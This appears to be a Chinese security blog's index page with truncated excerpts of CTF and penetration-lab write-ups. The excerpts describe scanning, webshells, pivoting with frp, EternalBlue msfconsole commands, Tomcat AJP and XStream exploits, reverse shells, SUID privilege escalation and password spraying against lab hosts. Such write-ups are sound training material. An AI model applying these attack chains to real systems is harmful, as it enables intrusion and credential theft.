St4rr's Blog

跟校队一起看的题，成功给校队送进决赛:) 其中的复赛也是我第一次打渗透赛() 初赛Writeup 复赛Writeup

先上fscan扫一波 img 扫目录 img 访问docs目录，发现是Tomcat 9.0.30 img 这里存在CVE-2020-1983 Tomcat 用现成的exp打 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100C:\Users\jyzho\OneDrive\桌面>python3 ajpShooter.py http://39.98.119.136:8080 8009 /WEB-INF/web.xml read _ _ __ _ _ /_\ (_)_ __ / _\ |__ ___ ___ | |_ ...

上fscan扫一遍，存在heapdump泄露 img 用JDumpSpider找到shiro key img shiroattack，得到第一个flag img img 写蚁剑的内存马进去 img img 直接就是root权限 img 扫内网 img 搭建frp img 有个匿名ftp，不知道为什么连不上，但是http访问过去是一样的 img 找到一个账密和一个新的网段 img 扫一下新网段 img rdp连上去，根据hint点一下锅炉开就有flag了 img img win+d返回桌面，一副被勒索了的样子。 img 找到勒索软件C:.exe，拿出来做逆向 查壳，.NET架构 img 用dnspy看下，找到关键代码 img 题目描述中给出了privateKey和encryptedAesKey privatekey如下 ...

先上fscan扫一波，扫到www.zip img 下载下来审计源码，发现存在任意文件读取 img 根据题目给出的hint读取flag img img 根据前面的hint读取服务器初始密码 img 登录Jenkins的后台 img Manage Jenkins -> Script Console执行命令 添加一个管理员用户 img 传个fscan上去扫一下，除本机外还有四台机器 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667C:\Users\st4rr\Desktop>fscan.exe -h 172.22.14.7/24 ___ _ / _ \ ___ ___ _ __ __ _ ___ ...

访问过去是wordpress 弱口令admin/123456成功进入后台 img 给404页面写个马进去 img 蚁剑连上去，拿到第一个flag img img fscan扫内网，除了本机还有四台机器 img 搭建frp img img 先打永恒之蓝 12345proxychains4 msfconsoleuse exploit/windows/smb/ms17_010_eternalblueset payload windows/x64/meterpreter/bind_tcp_uuidset RHOSTS 172.22.15.24exploit img dump哈希 img 打pth拿到第二个flag img 访问这台我们打下来的机器，admin/123456弱口令进后台 img 这里有很多邮箱，全部复制下来去掉xiaorang.lab的后缀做成一个字典 img 接下来打AS-REP Roas ...

今年打娱乐局 游戏题给我打爽了 Misc NepBotEvent 查了一下这是linux用evdev捕获的数据，写个脚本还原一下 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677import structfrom datetime import datetimeKEY_MAP = { 2: ("1", "!"), 3: ("2", "@"), 4: ("3", "#"), 5: ("4", "$"), 6: ("5", "%"), 7: ("6", "^"), 8: (&q ...

fscan扫一遍 img 有匿名登陆ftp，里面有两个文件，下载下来 img 看pom.xml，里面有xstream的依赖，根据版本可以找到对应的洞CVE-2021-29505 img 在自己vps上监听 img 传poc弹shell 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768POST /just_sumbit_it HTTP/1.1Host: 39.99.145.25:8080Content-Length: 3115Accept: application/xml, text/xml, */*; q=0.01DNT: 1X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/ ...

先上fscan扫一遍，发现有heapdump泄露 img 访问/actuator/heapdump下载 用工具分析，得到shirokey img 直接弹shell img img 这里是suid提权，查找这个vim.basic img 根据gtfobins上查到的进行利用 img img 再写个ssh公钥进去，方便后面的操作 img 传fscan扫内网，除本机外还有两台机器 img 搭建frp img img 可以看到有台机器上面有nacos存在漏洞，这里打snakeyaml 修改AwesomeScriptEngineFactory.java，改为添加一个管理员用户 img 点击生成jar.bat生成恶意jar包 img 将payload上传到刚刚打下来的机器中 img 在/tmp下开启web服务 img 先访问这台服务器 img na ...

先上fscan扫一遍 img 8000端口是后台，admin/123456弱口令登录 img 右上角官方插件点出来是华夏erp，这里可以打jdbc反序列化 起一个恶意mysql，config.json配置如下，ysoserial-all.jar放在同一路径下 1234567891011121314151617181920212223{ "config":{ "ysoserialPath":"ysoserial-all.jar", "javaBinPath":"java", "fileOutputDir":"./fileOutput/", "displayFileContentOnScreen":true, "saveToFile":true }, "fileread":{ ...

进去是个cms，访问/admin自动跳转到了后台 img 弱口令admin/123456登陆成功 img 可以找到漏洞CVE-2021-42643，写入一句话 img 蚁剑连接 img 可以找到flag，但是还没有权限读 利用diff命令suid提权 img img 上传fscan扫内网 img 除本机外还有三台主机，根据前面的提示先看WIN19，扫一遍发现开启了3389端口 img 搭建frp img 根据提示尝试用rockyou爆破，得到密码babygirl1，但是过期了 proxychains4 crackmapexec smb 172.22.4.45 -u Adrian -p /usr/share/wordlists/rockyou.txt -d WIN19 img 远程连接修改密码 img 桌面上有个文件夹，打开里面的html文件看一下，其中提到了可以修改计算机的注册表的gupdate i ...